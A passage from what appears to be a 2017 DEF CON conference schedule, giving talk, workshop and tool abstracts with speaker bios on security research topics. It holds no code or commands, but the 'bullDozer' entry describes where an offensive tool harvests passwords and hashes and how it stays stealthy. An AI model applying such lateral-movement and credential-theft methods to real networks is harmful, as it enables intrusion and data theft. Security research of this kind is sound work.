- Attempting to detect malicious activities via other means which are outside of the encrypted session, such as endpoint security tools and IP address blacklists.

- Break the TLS trust model by effectively attacking all connections, including trusted connections, via MiTM with a trusted certificate. (yes AV vendors, I'm looking at you)

This talk discusses (ok maybe rants about) the problems with the current "state of the art" and introduces other techniques, such as TLS Fingerprinting and TLS Handshake Mangling, which can be used to solve the same problems with less of the issues of current systems.

Bio:
Lee Brotherston is a Director of Security for a startup in the Toronto area. Having spent nearly 20 years in Information Security, Lee has worked as an Internal Security resource across many verticals including Finance, Telecommunications, Hospitality, Entertainment, and Government in roles ranging from Engineer to IT Security Manager.

He's also old enough to have done computering on a Commodore 64.
Twitter handle of presenter(s): @synackpse

Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 4 - Thursday - 14:30-18:30


Brainwashing Embedded Systems

Thursday, 14:30 to 18:30 in Octavius 4

Craig Young Security Researcher, Tripwire

Lane Thames Security Researcher, Tripwire

JivaSecurity Research Engineer, Tripwire

Learning the secret incantations to make embedded systems carry out your will is not as hard as one might think. In the world of IoT, the hardened system is rare and most times a firmware image is more than enough to find and exploit weakness. This session explains in detail a process for going from zero-knowledge to zero-day on real-world devices without breaking a sweat. Attendees to this tutorial session will learn the ropes of firmware dissection, app decompilation, and manual fuzz testing in a hands-on hack lab. Participants will be provided with a customized Kali Linux virtual appliance and given access to several consumer devices for analysis. These techniques have been successfully employed by the author to identify over 100 CVEs on embedded/IoT devices as well as to win the 0-day and CTF tracks in the DEF CON 22 SOHOpelessly Broken router hacking competition.

Prerequisites: Intermediate *nix knowledge; proficiency with a shell (including writing BASH or similar scripts); strong understanding of HTTP. Familiarity with tools for working with HTTP is a big plus (i.e. cURL, Burp, urllib, etc)

Materials: Nothing is required but in order to make the most out of the workshop, students will want to have a laptop with an 802.11 adapter and virtualization software capable of running an x86_64 virtual machine from an OVA/OVF (e.g. VirtualBox or VMWare). Virtual machine files will be made available for download from the Internet before the workshop and it is best for participants to load the content in advance. The material will also be available on USB and a local file server.

Max students: 72 | Registration: https://dc25_young.eventbrite.com/ (Sold out!)

Craig Young
Craig Young is a computer security researcher with Tripwire's Vulnerability and Exposures Research Team (VERT). He has identified and responsibly disclosed dozens of vulnerabilities in products from Google, Amazon, IBM, NETGEAR, Adobe, HP, Apple, and others. His research has resulted in numerous CVE assignments and repeated recognition in the Google Application Security Hall of Fame. Craig's presentations on Google authentication weaknesses have led to considerable security improvements for all Google users. Craig won in track 0 and track 1 of the first ever SOHOpelessly Broken contest at DEF CON 22 by demonstrating 10 0-day flaws in SOHO wireless routers. His research into iOS WiFi problems more recently exposed CVE-2015-3728 that could allow devices to inadvertently connect to malicious hot spots. Craig has also successfully employed fuzzing techniques to find flaws in a variety of open source software including a memory corruption in MatrixSSL that could be used to achieve code execution on at least 100,000 Internet gateways.

Lane Thames
Lane Thames is a software development engineer and security researcher with Tripwire's Vulnerability and Exposure Research Team (VERT). As a member of VERT, Lane develops software that detects applications, devices, and operating systems along with vulnerability detection and management software. He also spends time looking for new vulnerabilities, contributing to the Tripwire State of Security blog, and understanding emerging cybersecurity threats. Lane received his PhD in Electrical and Computer Engineering from the Georgia Institute of Technology and has spent over 10 years working in information technology and software/hardware development. Lane worked for nCircle prior to their acquisition, and continues his research work now for Tripwire.

Jiva
Jiva is a Security Research Engineer on the Vulnerability and Exposures Research Team (VERT) at Tripwire. Prior to Tripwire, Jiva worked at Coalfire doing consulting/penetration testing, Dell SecureWorks as a network security analyst, and worked at UGA doing penetration testing on departmental web applications. Jiva went to school at the University of Georgia for a Bachelor's and Master's degree in Computer Science, and is a long time member of the CTF teams disekt and SecDawgs.


Return to Index      -     

 

DEFCON - Track 3 - Sunday - 10:00-10:30


Breaking Bitcoin Hardware Wallets

Sunday at 10:00 in Track 3

20 minutes | Demo, Exploit

Josh Datko Principal Engineer, Cryptotronix LLC

Chris Quartier Embedded Engineer, Cryptotronix, LLC

The security of your bitcoins rests entirely in the security of your private key. Bitcoin hardware wallets help protect against software-based attacks to recover or misuse your key. However, hardware attacks on these wallets are not as well studied. In 2015, Jochen Hoenicke was able to extract the private key from a TREZOR using a simple power analysis technique. While that vulnerability was patched, he suggested the Microcontroller on the TREZOR, which is also the same on the KeepKey, may be vulnerable to additional side channel attacks.

In this presentation we will quickly overview fault injection techniques, timing, and power analysis methods using the Open Source Hardware tool, the ChipWhisperer. We then show how to apply these techniques to the STM32F205 which is the MCU on the Trezor and KeepKey. Lastly, we will present our findings of a timing attack vulnerability and conclude with software and hardware recommendations to improve bitcoin hardware wallets. We will show and share our tools and methods to help you get started in breaking your own wallet!

Josh Datko
Josh Datko is the owner of Cryptotronix, an embedded security consultancy. As a submarine officer, he was sent to Afghanistan to ensure that the Tailiban did not develop a submarine force—mission accomplished! He wrote a book on BeagleBones and crypto hardware which not many people have read, talked about embedded security at Portland BSides and HOPE, and presented a better way to make a hardware implant at DEF CON 22 which hopefully helped the NSA improve their spying.

Chris Quartier
Chris is the lead embedded hacker at Cryptotronix. He has worked at both big companies and IoT startups as an embedded developer working on bare metal and embedded linux board bring up, driver development, and trying to get those little logic analyzer clips to stay connected to a target. He's hacked on radios, rail guns, and fitness trackers but not all at the same time.


Return to Index      -     

 

DEFCON - Track 3 - Friday - 14:00-14:45


Breaking the x86 Instruction Set

Friday at 14:00 in Track 3

45 minutes | Demo, Tool

Christopher Domas Security Researcher, Battelle Memorial Institute

A processor is not a trusted black box for running code; on the contrary, modern x86 chips are packed full of secret instructions and hardware bugs. In this talk, we'll demonstrate how page fault analysis and some creative processor fuzzing can be used to exhaustively search the x86 instruction set and uncover the secrets buried in your chipset. We'll disclose new x86 hardware glitches, previously unknown machine instructions, ubiquitous software bugs, and flaws in enterprise hypervisors. Best of all, we'll release our sandsifter toolset, so that you can audit - and break - your own processor.

Christopher Domas
Christopher Domas is a cyber security researcher and embedded systems engineer, currently investigating low level processor exploitation. He is best known for releasing impractical solutions to non-existent problems, including the world's first single instruction C compiler (M/o/Vfuscator), toolchains for generating images in program control flow graphs (REpsych), and Turing-machines in the vi text editor. His more relevant work includes the binary visualization tool ..cantor.dust.. and the memory sinkhole x86 privilege escalation exploit.

@xoreaxeaxeax


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Friday - 14:00-15:00


Title:
Breaking TLS: A Year in Incremental Privacy Improvements

Author:
Andrew Brandt (Symantec)

Abstract:
I run a lab in which I let a lot of computers, as well as networked "IoT" devices, phone home, and then I use enterprise-level tools to decrypt and capture that TLS/SSL network traffic. In the past year, I've been observing a steady increase in the number of devices and services which flat-out refuse to let me decrypt their communications - an unequivocally Good Thing for privacy and security. But I've also witnessed some disastrous problems, such as large corporations, who should know better, behaving badly, using self-signed or expired certificates for critical sites used to, for instance, deliver firmware updates.

In this overview, I'll discuss the good, bad, and really, really ugly things I've learned about what, how, and to whom these devices communicate, and in some cases, the contents of those communications. I'll also provide an overview of the tools and techniques I've used to re-sign certificates and capture the decrypted data, including how (and why) you can (and probably should) do this yourself. Finally, I plan to offer my own manifesto to businesses large and small about how they should do a much better job at protecting the privacy of their customers.

Bio:
Andrew Brandt is the Director of Threat Research for Symantec, whose previous employer was acquired in the past year. In his role, he runs a malware research lab in which he infects all manner of devices with malware and permits the devices to phone home, in order to learn more about how, and to whom, malware communicates.
Twitter handle of presenter(s): @threatresearch

Return to Index      -     

 

DEFCON - Track 1 - Saturday - 10:20-10:40


Breaking Wind: Adventures in Hacking Wind Farm Control Networks

Saturday at 10:20 in 101 Track

20 minutes

Jason Staggs Security Researcher at the University of Tulsa

Wind farms are becoming a leading source for renewable energy. The increased reliance on wind energy makes wind farm control systems attractive targets for attackers. This talk explains how wind farm control networks work and how they can be attacked in order to negatively influence wind farm operations (e.g., wind turbine hijacking). Specifically, implementations of the IEC 61400-25 family of communications protocols are investigated (i.e., OPC XML-DA). This research is based on an empirical study of a variety of U.S. based wind farms conducted over a two year period. We explain how these security assessments reveal that wind farm vendor design and implementation flaws have left wind turbine programmable automation controllers and OPC servers vulnerable to attack. Additionally, proof-of-concept attack tools are developed in order to exploit wind farm control network design and implementation vulnerabilities.

Jason Staggs
Dr. Jason Staggs is an independent information security researcher with strong interests in critical infrastructure protection, telecommunications, penetration testing, network security and digital forensics. Jason has spoken at national and international conferences, authored various peer-reviewed publications and lectured undergraduate and graduate level courses on a variety of cyber security topics. His expertise in digital forensics has enabled him to provide invaluable assistance to law enforcement agencies at the local, state and federal levels in order to solve high-profile cybercrimes. In his spare time, Jason enjoys reverse engineering proprietary network stacks in embedded devices and diving through ancient RFCs to demystify obscure network protocols. Jason attended graduate school at The University of Tulsa where he earned his M.S. and Ph.D. degrees in Computer Science.


Return to Index      -     

 

VMHV - Roman 1, Promenade Level - Friday - 13:00-13:45


Title:
Brief history of election machine hacking and lessons learned so far and why it is hard to tell the difference between incompetence and malice.

Title: Brief history of election machine hacking and lessons learned so far and why it is hard to tell the difference between incompetence and malice. Brief history of election machine hacking and lessons learned so far and why it is hard to tell the difference between incompetence and malice.


Harri Hursti is a Finnish computer programmer and former Chairman of the Board and co-founder of ROMmon where he supervised in the development of the worlds smallest 2 gigabit traffic analysis product that was later acquired by F-Secure Corporation.
Hursti is well known for participating in the Black Box Voting hack studies, along with Dr. Herbert Hugh Thompson. The memory card hack demonstrated in Leon County is popularly known as the Hursti Hack. This hack was part of a series of four voting machine hacking tests organized by the nonprofit election watchdog group Black Box Voting in collaboration with the producers of HBO documentary, Hacking Democracy. The studies proved serious security flaws in the voting systems of Diebold Election Systems.

Return to Index      -     

 

Demolabs - Table 5 - Saturday - 14:00-15:50


Bropy

Matt Domko

Saturday from 1400-1550 at Table Five

Provides simple anomaly based IDS capabilities using Bro. Bropy parses logs to generate network baselines using a simple Y/N interface, and the accompanying bro script generates logs for traffic outside of the baseline.

https://github.com/hashtagcyber/bropy

Matt Domko
"I'm just a guy playing with Legos. I crudely assemble the knowledge I have to build a solution for my problems."

Matt Domko is currently an Information Security instructor for Chiron Technology Services in Augusta, Georgia. His experiences as an enterprise administrator and cyber network defender for the United States Army are what drive his passion for network defense and "Blue Teaming". Bikes, Beards, and Karaoke


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 7 - Thursday - 10:30-14:30


Build your stack with Scapy, for fun and profit

Thursday, 10:30 to 14:30 in Octavius 7

stryngs

Jack64

zero-x

802.11 is still the Wild West in 2017. It has been around since the 90's, yet as most things with the Internet, security has always been a bolt-on addition. Through passive and active observations over the past couple years, it occurred to us that a workshop on how to abuse wifi would be interesting. This in and of itself is a spiderweb. There are so many ways to approach it; jam it, DOS it, crack it, so forth and so on.

We decided on the "ride the wave" approach. Take the existing infrastructure, and use it to your advantage by molding custom frames as you see fit. We feel this is under utilized and thus: demonstrations, beatings and examples should be given. ARP, ARP, ARP, who let the ARPs out. That is typically the battle cry for anything "LAN" these days. Pop the network, hop on the network, do your ARP, grab your MITM and go. Tried and true, it works, but it's outdated, oldskool and quite frankly, boring. Any hacker worth their salt should be able to arpspoof and ettercap. Any WIDS/WIPS should instantly lock on to what's going on and ban or alert accordingly. What we need, is a new approach.

Enter, Scapy. Without spending an hour on the wonders of Scapy and what it can do for you as a Pentester in this briefing, we'd quite frankly rather cut down to the nuts and bolts, and just, show you.

This workshop is going to center around Scapy and how you as a Pentester can use it to your advantage. Take the 802.11 and bend it to your will. Make it do your bidding and leave the SysAdmins scratching

Prerequisites: Familiarity with RFC 1149

Materials: - Laptop with bootable Linux of some variety
- Debian based is preferred
- apt is way easier than yum...
- WiFi NIC with Monitor Mode capability
- Curiosity

Max students: 85 | Registration: https://dc25_stryngs.eventbrite.com/ (Sold out!)

stryngs
stryngs has been into the scene since 2006 when he first discovered wifi. Since then he has learned and absorbed all he can. He has bothered many a person on the IRC. Though he might have perturbed you with his questions, he is grateful for the knowledge you bestowed upon him. Without the community, stryngs wouldn't be where he is today. As such, hopefully with this workshop, he is truly giving back to the community which brought him to where he is at today.

Jack64
João Pena Gil (Jack64) is a computer security researcher from Portugal, working in the field since 2015. Currently working at Checkmarx as the AppSec Analysis Team Leader by day and a Cobalt Core Researcher by night, Jack64's interests are broad in information security, ranging from networking protocols to application security and cryptography. Stryngs had a big influence in Jack64's interest in information security, sharing with him his proof-of-concept for airpwn-ng, which prompted Jack64 to learn more about 802.11 and the rest of the networking stack in general, leveraging the powerful capabilities of scapy and python. This is some of the knowledge he hopes to share in this workshop.

zero-x
Bio Coming Soon


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 5 - Thursday - 10:30-14:30


Building Application Security Automation with Python

Thursday, 10:30 to 14:30 in Octavius 5

Abhay Bhargav CTO, we45

In an age of rapid-release applications, DevOps and small application security teams, the only way application security can scale, is with automation. In this workshop, I will introduce some key automation practices and techniques using Python that students can use in their own application security programs for quick wins. These techniques will predominantly focus on developing automation scripts harnessing API from Open Source Web Vulnerability Scanners (like OWASP ZAP), Building fuzzers harnessing features of tools like mitmproxy with as little as a few lines of code and using NoSQL databases for easy search and to generate powerful application security analytics. The session will be entirely hands-on, with a lot of coding and very little theory.

Prerequisites:
Knowledge of Python basics preferred but not required ( Basic Python skills are good enough. Knowledge of variables, loops, modules, imports and data structures would suffice). Examples with complete source code would be given to participants to study further. Hands-on exercises will be "templatized" to ensure that people are up and running quickly, even if they are not familiar with Python.

Materials:
Laptop with 64bit CPU (Mac/Win/*nix) is good with 8GB+ RAM (Host Machine) preferred, and atleast 50GB of free HDD to import a Virtualbox VM
For Windows Laptops please ensure that Virtualization is enabled at the BIOS to run the VM. There have been issues where Virtualization being disabled at the BIOS has resulted in the VM not working. Please ensure that you have the necessary permissions to change BIOS settings if required (especially for work/corporate laptops)
64 bit CPU is required. we would be using Docker images and docker doesn't support 32bit systems
Please have the latest version of Virtualbox installed on the laptop.

Max students: 50 | Registration: https://dc25_bhargav.eventbrite.com (Sold out!)

Abhay Bhargav
Abhay Bhargav is the CTO of we45, a focused Application Security company. Abhay is the author of two international publications. “Secure Java for Web Application Development” and “PCI Compliance: A Definitive Guide”. Abhay is a builder and breaker of applications, and has authored multiple applications in Django and NodeJS. He is a passionate Pythonista and loves the idea of automation in security. This passion prompted him to author the world’s first hands-on Security in DevOps workshop that has been delivered in multiple locations, and recently as a highly successful workshop at the OWASP AppSecUSA 2016, OWASP AppSecEU 2017 and OWASP Appsec USA 2017. In addition , Abhay speaks regularly at industry events including OWASP, ISACA, Oracle OpenWorld, JavaOne, and others.


Return to Index      -     

 

RCV - Palermo room, Promenade level - Sunday - 10:00-10:35


Building Google for Criminal Enterprises

Abstract

I was able to create a proof of concept application that scrubs a recreation of the Ohio Voter Database, which includes first name, last name, date of birth, home address, and link each entry confidently to its real owners Facebook page. By doing this I have created a method by which you can use the Voter Database to seed you with name address and DOB, and Facebook to hydrate that information with personal information.

My application was able to positively link a voter record to a Facebook account approximately 45% of the time. Extrapolated that out over the 6.5 million records in my database and you get 2.86 million Ohio resident Facebook records

Speaker Profile

Anthony Russell (@DotNetRussell)

https://www.dotnetrussell.com/


Return to Index      -     

 

Demolabs - Table 2 - Saturday - 14:00-15:50


bullDozer

Keith Lee

Saturday from 1400-1550 at Table Two

Audience: Offense

The tool allows you to supply a username and password that you have captured and cracked from Responder or other sources as well as an IP ranges, subnet or list of IP addresses.

The tool finds its way around the network and attempts to gain access into the hosts, finds and dumps the passwords/hashes, resuses them to compromise other hosts in the network.

Below are some of the places the tools look for hashes/passwords
1. SYSVOL
2. File Shares
3. Memory
4. Tokens (Incognito)
5. MSSQL service credentials
6. Unattend.xml, sysprep.xml, sysprep.inf

It will also exploit the Domain Controller if its vulnerable to MS14-069 and dump the hashes.
Pillaging the Corporate Network
The tool will also attempt to 'rob' the shares and hosts of the sensitive data/information.
1. Finding files whose filename have the word 'password' in it
2. Dump Wireless. WinVNC, UltraVNC, Putty, SNMP, Windows AutoLogon, Firefox Stored credentials,
3. Find KeePass Databases, FileZilla sitemanger.xml, Apache Httpd.conf, and etc. if they contain credentials.
4. Finding PII data and Credit Card Track Data from memory
5. Browser credentials

It will iterate and continue to test and exploit the systems until all hosts are compromised. Another useful feature is for attackers who want to find the right credentials in order to access a certain folder under the shares on the host.

For example, \\host1\share\private

You might have the account that allows you to access \\host1\share but you do not know which account you need to access \\host1\share\private.

Using the credentials the tool has captured and finds the 'right key' to the lock.

It is possible to disable any of the options (e.g. no memory search of PAN numbers) so to add a random delay to its operations so as to remain stealth.

We are planning to allow users to develop modules/plugins and encourage development so that its feature set can be extended.

Keith Lee
Keith Lee is a Senior Security Consultant with Trustwave's SpidersLabs Asia-Pacific. SpiderLabs is one of the world's largest specialist security teams, with over 100 consultants spread across North America, South America, Europe and the Asia Pacific. SpiderLabs has a focus on original security research and regularly presents at conferences such as BlackHat, DefCon, OWASP, Hack In The Box and Ruxcon. Keith is based out of Singapore and has primary focus is on providing penetration testing, social engineering and incident response services to clients in the Asia-Pacific region.


Return to Index      -     

 

RCV - Palermo room, Promenade level - Saturday - 10:00-11:59


Burner Phone Challenge

Abstract

Once upon a time, I saw this tweet from Kenneth Lipp: https://twitter.com/kennethlipp/status/848566661384990722. In summary, the tweet is about an AT&T program available to law enforcement meant to make burner phones meaningless. Even if someone switches phones, if their pattern of behavior (both in terms of contacts and call locations) stays the same or similar, AT&T can determine that it’s the same person simply using a new phone.

This seems like a great teaching opportunity! Attendees at this workshop will build the same analytics as AT&T does, using Python on some “phone metadata” created just for you to play with. You’ll be able to find burner phones in the mess, and hopefully learn some fun network analysis, machine learning, and Python programming skills along the way!

Speaker Profile

Dakota Nelson (@jerkota)

Short: BSLV, SOURCE Boston x2, SOURCE Seattle, other non-security presentations.

Long: http://dakotanelson.com/

https://strikersecurity.com/


Return to Index      -     

 

DEFCON - Track 2 - Sunday - 13:00-13:45


Bypassing Android Password Manager Apps Without Root

Sunday at 13:00 in Track 2

45 minutes | Demo, Exploit

Stephan Huber Fraunhofer SIT

Siegfried Rasthofer Fraunhofer SIT

Security experts recommend using different, complex passwords for individual services, but everybody knows the issue arising from this approach: It is impossible to keep all the complex passwords in mind. One solution to this issue are password managers, which aim to provide a secure, centralized storage for credentials. The rise of mobile password managers even allows the user to carry their credentials in their pocket, providing instant access to these credentials if required. This advantage can immediately turn into a disadvantage as all credentials are stored in one central location. What happens if your device gets lost, stolen or a hacker gets access to your device? Are your personal secrets and credentials secure?

We say no! In our recent analysis of well-known Android password manager apps, amongst them are vendors such as LastPass, Dashlane, 1Password, Avast, and several others, we aimed to bypass their security by either stealing the master password or by directly accessing the stored credentials. Implementation flaws resulted in severe security vulnerabilities. In all of those cases, no root permissions were required for a successful attack. We will explain our attacks in detail. We will also propose possible security fixes and recommendations on how to avoid the vulnerabilities.

Stephan Huber
Stephan Huber is a security researcher at the Testlab mobile security group at the Fraunhofer Institute for Secure Information Technology (SIT). His main focus is Android application security testing and developing new static and dynamic analysis techniques for app security evaluation. He found different vulnerabilities in well-known Android applications and the AOSP. In his spare time he enjoys teaching students in Android hacking.

Siegfried Rasthofer
Siegfried Rasthofer is a vulnerability- and malware-researcher at Fraunhofer SIT (Germany) and his main research focus is on applied software security on Android applications. He developed different tools that combine static and dynamic code analysis for security purposes and he is the founder of the CodeInspect reverse engineering tool. He likes to break Android applications and found various AOSP exploits. Most of his research is published at top tier academic conferences and industry conferences like DEF CON, BlackHat, HiTB, AVAR or VirusBulletin.


Return to Index      -     

 

DEFCON - Track 3 - Saturday - 16:00-16:45


CableTap: Wirelessly Tapping Your Home Network

Saturday at 16:00 in Track 3

45 minutes | Demo, Tool, Exploit

Marc Newlin Security Researcher at Bastille Networks

Logan Lamb Security Researcher at Bastille Networks

Chris Grayson Founder and Principal Engineer at Web Sight.IO

We discovered a wide array of critical vulnerabilities in ISP-provided, RDK-based wireless gateways and set-top boxes from vendors including Cisco, Arris, Technicolor, and Motorola. Our research shows that it was possible to remotely and wirelessly tap all Internet and voice traffic passing through the affected gateways, impacting millions of ISP customers.

Imagine for a moment that you want a root shell on an ISP-provided wireless gateway, but you're tired of the same old web vulns. You want choice. Maybe you want to generate the passphrase for the hidden Wi-Fi network, or log into the web UI remotely using hard-coded credentials.

Don't have an Internet connection? Not to worry! You can just impersonate a legitimate ISP customer and hop on the nearest public hotspot running on another customer's wireless gateway. Once online, you can head on over to GitHub and look at the vulnerability fixes that haven't yet been pushed to customer equipment.

In this talk, we will take you through the research process that lead to these discoveries, including technical specifics of each exploit. After showcasing some of the more entertaining attack chains, we will discuss the remediation actions taken by the affected vendors.

Marc Newlin
Marc is a wireless security researcher at Bastille, where he discovered the MouseJack and KeySniffer vulnerabilities affecting wireless mice and keyboards. A glutton for challenging side projects, Marc competed solo in two DARPA challenges, placing third in the DARPA Shredder Challenge, and second in the first tournament of the DARPA Spectrum Challenge.

Logan Lamb
Logan joined Bastille Networks in 2014 as a security researcher focusing on applications of SDR to IoT. Prior to joining Bastille Networks, he was a member of CSIR at Oak Ridge National Lab where his focus was on symbolic analysis of binaries and red-teaming critical infrastructure.

Chris Grayson
Christopher Grayson (OSCE) is the founder and principal engineer at Web Sight.IO. In this role he handles all operations, development, and research efforts. Christopher is an avid computing enthusiast hailing from Atlanta, Georgia. Having made a habit of pulling things apart in childhood, Chris has found his professional home in information security. Prior to founding Web Sight.IO, Chris was a senior penetration tester at the security consultancy Bishop Fox, and a research scientist at the Georgia Institute of Technology. During his tenure at these organizations, Chris became a specialist in network penetration testing and in the application of academic tactics to the information security industry, both of which contributed to his current research focus of architecting and implementing high-security N-tier systems. Chris attended the Georgia Institute of Technology where he received a bachelor's degree in computational media, a master's degree in computer science, and where he organized and led the Grey H@t student hacking organization.


Return to Index      -     

 

DEFCON - Track 1 - Sunday - 14:00-14:45


Call the plumber - you have a leak in your (named) pipe

Sunday at 14:00 in 101 Track

45 minutes | Demo

Gil Cohen CTO, Comsec group

The typical security professional is largely unfamiliar with the Windows named pipes interface, or considers it to be an internal-only communication interface.
As a result, open RPC (135) or SMB (445) ports are typically considered potentially entry points in "infrastructure" penetration tests.

However, named pipes can in fact be used as an application-level entry vector for well known attacks such as buffer overflow, denial of service or even code injection attacks and XML bombs, depending on the nature of listening service to the specific pipe on the target machine.

As it turns out, it seems that many popular and widely used Microsoft Windows-based enterprise applications open a large number of named pipes on each endpoint or server on which they are deployed, significantly increase an environment's attack surface without the organization or end user being aware of the risk.
Since there's a complete lack of awareness to the entry point, there's very limited options available to organizations to mitigate it, making it a perfect attack target for the sophisticated attacker.

In this presentation we will highlight how named pipes have become a neglected and forgotten external interface. We will show some tools that can help find vulnerable named pipes, discuss the mitigations, and demonstrate the exploitation process on a vulnerable interface.

Gil Cohen
Gil is an experienced application security instructor, architect, consultant and pentester just starting his 12th year in the field.

With past experience in the civilian, government and military cyber security industries, Gil currently serves as the CTO of Comsec Group, in charge of training, research, service lines, methodologies and quality assurance.

With a long time record as an SQL injection fanatic, Gil was responsible for publishing the "SQL Injection Anywhere" technique in 2010, which is currently in use in a variety of automated scanners in the market, and enables the blind detection and exploitation of potential injections in any part of the SQL statement.

He also has a taste for nostalgia, and has been working for a while on abuses to protocols that software developers would prefer to forget.

@Gilco83
www.facebook.com/gilc83


Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Saturday - 11:00-11:59


Title:
Catch me leaking your data... if you can...

1100 Satuday
Mike Raggo & Chet Hosmer
@DataHiding @PythonForensics
Catch me leaking your data... if you can...
"Organizations remain largely ill-equipped to identify data being exfiltrated from their networks. In this presentation we propose a plethora of methods of covert exfiltration from a network by highlighting exploitable flaws in wired and wireless network protocols while also applying steganographic and decoy techniques. We then outline a mockup environment to simulate an enterprise network and exfiltrate covert data that we capture and save in a PCAP file. At the end of the session we provide access to the downloadable PCAP file to determine who can be the 1st to identify covert communication. We will additionally provide the plain-text info to see if anyone can figure out how we did it. Winners will be Tweeted out afterwards.
"

Return to Index      -     

 

Demolabs - Table 3 - Saturday - 16:00-17:50


CellAnalysis

Pedro Cabrera

Saturday from 1600-1750 at Table Three

Audience: Defensive and mobile security

CellAnalysis is one more tool to be added to the pentester arsenal. Nowadays we can find other tools intended to find fake cells, most of them use active monitoring; that is, they monitor traffic coming to the SIM card on a smart phone, so that only cell attacks are scanned on the same network as the SIM card. CellAnalysis offers a different vision, it performs a passive traffic monitoring, so it does not require a SIM card or a mobile device, simply a OsmocomBB phone or compatible device SDR (rtlsdr, usrp, hackrf or bladerf) to start monitoring all the frequencies of the GSM spectrum.

http://www.fakebts.com/

Pedro Cabrera
Software Defined Radio and UAV enthusiast, Pedro Cabrera has worked over than 10 years in the main Spanish telecommunications operators, conducting security audits and pentesting in mobile and fixed networks. Besides working with the telecommunications operators, Pedro leads Open Source projects such as intrusion detection systems for GSM networks, which has led him to study the various fake 2G cells attacks and existing solutions. He has also collaborated in press articles on this topic, wardriving around Madrid City looking for how many and where fake stations can be found just walking. During this year he has participated in security events, training "Attacking 2G/3G Mobile Networks, Smartphones and Apps" (BlackHat Asia) and demonstrating how to remote inject commands to commercial drones; "All your bebop drones still belong to us: drone hijacking" (RootedCon) and showing how to intercept 2G calls and SMS under a frequency channel hopping network, using low cost SDR; HackRF and BladeRF.


Return to Index      -     

 

SEV - Emperors BR II - Saturday - 19:15-20:05



Saturday July 29 7:15PM 50 mins
Change Agents: How to Effectively Influence Intractable Corporate Cultures
It’s no secret that trying to change corporate culture is hard. This is primarily due to the fact that large corporations are complex systems and fundamentally averse to change. This reluctance is rooted in a systematic misalignment of shared vision, shared values, and shared culture within the organization. This talk defines a new method of business transformation by illustrating how to effectively influence corporate cultures towards collective action. To achieve that end, we outline an iterative framework along three main vectors: assess the people and environment, craft a narrative, then utilize timing to deliver your message for maximum impact. If you have ever been frustrated by a lack of political will within your own organization, come and join us. You will learn how to become a change agent yourself, how to create other change agents, then finally how to transform your corporation into a change agent.

Keith Conway: @algirhythm
Cameron Craig:

Keith Conway:
Keith Conway is a strategist and consultant operating at the nexus of user experience, systems thinking, and business development. Keith has worked with some of the world’s largest brands including Macy’s, CA Technologies, Estee Lauder, Coca-Cola, Facebook, Spotify, Nissan, and Google to name a few. Keith’s career focus aims to architect win/win situations that create sustainable value for businesses while designing memorable experiences for customers. In his free time, Keith enjoys studying cycles and patterns found in nature, complexity theory, group dynamics, and macroeconomics. Occasionally, you will hear him talking about the monolith.

Cameron Craig:
Cameron Craig is a twenty-year contributor to new product development and interactive digital media practices, holding strategic roles in high technology start-ups, digital agencies, and most recently a Fortune 500 retailer. Cameron is currently VP – Head of User Experience/Innovation at Macy’s | Bloomingdales, where he leads the team researching, designing and dreaming up the company’s next generation products and services. Prior to Macy’s, Cam was a Partner and Managing Director of Strategy, at Sprout Designs a product design agency in San Francisco. Sprout’s clients include GoPro, The Bill and Melinda Gates Foundation, Intuit, Sony, BEA, Sun Microsystems/Oracle, The San Francisco SPCA, and DocuSign.


Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 17:00-17:59


Title:
Child Abuse Material, Current Issues Trends & Technologies

1700 Friday
@h0tdish and @mickmoran
Child Abuse Material, Current Issues Trends & Technologies

"The Skytalk will be very specifically about updating the information security/hacker community of contemporary issues, trends and technologies related to Child Abuse Material (CAM) online by Laura Friend, investigator, research analyst and Cyber-Criminologist and Mick Moran formerly of INTERPOL.
We would like to introduce the term ""Child Abuse Material"" into the hacker/infosec vernacular instead of ""Child Pornography and go into detail about why this and other current issues are valuable information for front line information security professionals.
We wish to engage in a Q&A discussion at the end about current technologies used by INTERPOL.
This will be a unique opportunity for the information security/hacker community to ask questions directly to a Criminologist with years of OSINT experience tracking violent crimes and a former INTERPOL Child Abuse Material investigator. "

Return to Index      -     

 

DEFCON - Track 1 - Friday - 17:00-17:45


Cisco Catalyst Exploitation - Artem Kondratenko

Cisco Catalyst Exploitation

Friday at 17:00 in 101 Track

45 minutes | Demo

Artem Kondratenko Penetration Tester, Security Researcher

On March 17th, Cisco Systems Inc. made a public announcement that over 300 of the switches it manufactures are prone to a critical vulnerability that allows a potential attacker to take full control of the network equipment.

This damaging public announcement was preceded by Wikileaks' publication of documents codenamed as "Vault 7" which contained information on vulnerabilities and description of tools needed to access phones, network equipment and even IOT devices.

Cisco Systems Inc. had a huge task in front of them - patching this vast amount of different switch models is not an easy task. The remediation for this vulnerability was available with the initial advisory and patched versions of IOS software were announced on May 8th 2017.

We all heard about modern exploit mitigation techniques such as Data Execution Prevention, Layout Randomization. But just how hardened is the network equipment? And how hard is it to find critical vulnerabilities?

To answer that question I decided to reproduce the steps necessary to create a fully working tool to get remote code execution on Cisco switches mentioned in the public announcement.

This presentation is a detailed write-up of the exploit development process for the vulnerability in Cisco Cluster Management Protocol that allows a full takeover of the device.

Artem Kondratenko
Artem is a Penetration Tester at Kaspersky Lab. On time between red team engagements he is doing security research of software and hardware appliances. Author of multiple CVE's on VMware Virtualization Platforms (CVE-2016-5331, CVE-2016-7458, CVE-2016-7459, CVE-2016-7460). Enjoys contributing to the community by writing penetration testing tools such as Invoke-Vnc (PowerShell vnc injector, part of CrackMapExec) and Rpivot (reverse socks4 proxy, now part of BlackArch Linux Distro).

@artkond, https://github.com/artkond,
https://artkond.com


Return to Index      -     

 

DEFCON - Track 1 - Friday - 12:00-12:45


CITL and the Digital Standard - A Year Later

Friday at 12:00 in 101 Track

45 minutes | Art of Defense

Sarah Zatko Chief Scientist, Cyber ITL

A year ago, Mudge and I introduced the non-profit Cyber ITL at DEF CON and its approach to automated software safety analysis. Now, we'll be covering highlights from the past year's research findings, including our in-depth analysis of several different operating systems, browsers, and IoT products.

Parts of our methodologies have now been adopted by Consumer Reports and rolled into their Digital Standard for evaluating safety, security, and privacy, in a range of consumer devices. The standard defines important consumer values that must be addressed in product development, with the goal of enabling consumer organizations to test, evaluate, and report on whether new products protect consumer security, safety, and privacy.

Sarah Zatko
